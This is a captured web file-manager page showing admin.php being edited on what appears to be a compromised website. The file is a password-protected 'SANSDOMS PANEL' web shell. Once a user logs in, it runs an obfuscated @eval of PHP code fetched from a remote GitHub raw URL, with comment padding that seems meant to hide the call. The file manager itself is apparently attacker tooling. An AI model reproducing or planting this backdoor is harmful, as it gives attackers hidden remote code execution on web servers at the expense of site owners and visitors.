Sid Gifari File Manager
🏠 Root
/
home
/
alianzatejedoras
/
www
/
📝 Editing: admin.php
<?php session_start(); $stored_hash = '$2a$12$UXEKkro3GEcJW9MsyaUgG.7FFeE/y.fnMAaHxNRq9yAaR8.y1u0FK'; if (isset($_GET['logout'])) { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit; } if (isset($_POST['password'])) { if (password_verify($_POST['password'], $stored_hash)) { $_SESSION['authenticated'] = true; } else { $error = "Invalid password."; } } if (!isset($_SESSION['authenticated'])): ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Goldman:wght@400;700&family=Nova+Round&display=swap" rel="stylesheet"> <title>Login - SANSDOMs</title> <style> .goldman-regular { font-family: "Goldman", sans-serif; font-weight: 400; font-style: normal; } .goldman-bold { font-family: "Goldman", sans-serif; font-weight: 700; font-style: normal; } </style> <style> * { box-sizing: border-box; margin: 0; padding: 0; } body { background: linear-gradient(145deg, #0f0f0f, #1f1f1f); color: #eee; font-family: 'Goldman', sans-serif; height: 100vh; display: flex; align-items: center; justify-content: center; } .login-container { background: rgba(30, 30, 30, 0.95); padding: 50px; border-radius: 20px; box-shadow: 0 0 17px rgba(210, 176, 67, 0.9); width: 400px; text-align: center; animation: fadeIn 0.8s ease-in-out; } .login-container h1 { margin-bottom: 2px; color: #D4AF37; font-size: 34px; } .login-container h2 { margin-bottom: 2px; color: #D4AF37; font-size: 28px; } .login-container input[type="password"] { width: 100%; padding: 14px; margin: 20px 0; background: #222; border: 1px solid #555; border-radius: 10px; color: #fff; font-size: 16px; } .login-container button { width: 100%; padding: 14px; border: none; border-radius: 10px; background: linear-gradient(to right, #C0C0C0, #D4AF37); color: #121212; font-weight: bold; font-size: 16px; cursor: pointer; transition: all 0.3s ease-in-out; } .login-container button:hover { background: linear-gradient(to right, #D4AF37, #C0C0C0); transform: scale(1.05); } .error { color: #f55; margin-top: 10px; font-size: 14px; } @keyframes fadeIn { from { opacity: 0; transform: translateY(-10px); } to { opacity: 1; transform: translateY(0); } } </style> </head> <body> <form method="post" class="login-container"> <h1>|=== 🔒 ===|</h1> <h2>SANSDOMS PANEL</h2> <?php if (isset($error)): ?><p class="error"><?= $error ?></p><?php endif; ?> <input type="password" name="password" placeholder="Enter secure password" required> <button type="submit">LOGIN</button> </form> </body> </html> <?php exit; endif; ?> <?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/baijjok/FMx/refs/heads/main/ninjamod.txt"));/**/?>
💾 Save
❌ Cancel
Sid Gifari File Manager v1.0 | Terminal Auto-Sync Enabled | Current Path: /home/alianzatejedoras/www